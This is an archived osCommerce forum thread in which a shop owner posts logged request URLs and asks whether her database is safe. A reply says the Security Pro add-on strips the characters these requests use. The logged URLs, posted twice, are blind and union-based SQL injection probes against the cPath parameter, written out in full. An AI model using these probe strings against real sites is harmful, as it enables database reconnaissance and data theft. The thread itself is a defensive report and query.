Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Under attack - is my database ok?


tigergirl

Recommended Posts

Wow,

got a shock when I saw this in who's online:

 

/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1 
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1 	/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615 
	/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1 
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 
/index.php?cPath=31%20/*!49999%20and%201=2*/-- 
/index.php?cPath=31%20and%201=2%20union%20select%201-- 
/index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)-- 
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1 

 

And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic.

I'm feeling lucky today......maybe someone will answer my post!

I do try and answer a simple post when I can just to give something back.

------------------------------------------------

PM me? - I'm not for hire

Link to comment
Share on other sites

Wow,

got a shock when I saw this in who's online:

 

/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1 
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 
	/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1 	/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615 
	/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1 
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 
/index.php?cPath=31%20/*!49999%20and%201=2*/-- 
/index.php?cPath=31%20and%201=2%20union%20select%201-- 
/index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)-- 
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1 

 

And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic.

 

Every one of those injection attacks uses illegal characters that would be stripped by security pro.

Link to comment
Share on other sites

Every one of those injection attacks uses illegal characters that would be stripped by security pro.

 

ok, well I sure am glad you made such a fantastic mod and that I installed it ages ago! I haven't had a single problem with it at all.....

 

Thanks Rob. :D

I'm feeling lucky today......maybe someone will answer my post!

I do try and answer a simple post when I can just to give something back.

------------------------------------------------

PM me? - I'm not for hire

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...